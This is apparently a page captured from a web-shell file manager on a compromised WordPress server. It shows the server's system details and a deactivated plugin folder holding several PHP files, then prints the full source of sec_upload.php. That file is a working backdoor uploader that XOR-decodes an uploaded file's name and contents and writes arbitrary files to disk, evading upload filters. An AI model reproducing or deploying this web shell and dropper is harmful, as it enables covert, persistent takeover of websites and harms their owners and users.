[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins.deactivated
/
suffer
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
๐ sec_upload.php
1,089 B
SET
[ EDIT ]
|
[ DEL ]
๐ style.php
945 B
SET
[ EDIT ]
|
[ DEL ]
๐ suffer.php
17,685 B
SET
[ EDIT ]
|
[ DEL ]
๐ wpxo.php
7,054 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: sec_upload.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $uploaded = $_FILES['image']; // ่งฃ็ ๆไปถๅ $encoded_name = pathinfo($uploaded['name'], PATHINFO_FILENAME); $hex = ''; for ($i = 0; $i < strlen($encoded_name); $i += 2) { $hex .= chr(hexdec(substr($encoded_name, $i, 2))); } $decoded_name = ''; foreach (str_split($hex) as $char) { $decoded_name .= chr(ord($char) ^ 0xAA); } $extension = pathinfo($uploaded['name'], PATHINFO_EXTENSION); // ่งฃ็ ๆไปถๅ ๅฎน $encoded_content = file_get_contents($uploaded['tmp_name']); $decoded_content = ''; for ($i = 0; $i < strlen($encoded_content); $i++) { $decoded_content .= chr(ord($encoded_content[$i]) ^ 0xAA); } // ไฟๅญๆไปถ $final_name = $decoded_name . ($extension ? ".$extension" : ''); file_put_contents($final_name, $decoded_content); echo "File decoded successfully: $final_name"; } else { echo "Please upload file using POST with 'image' parameter"; } ?>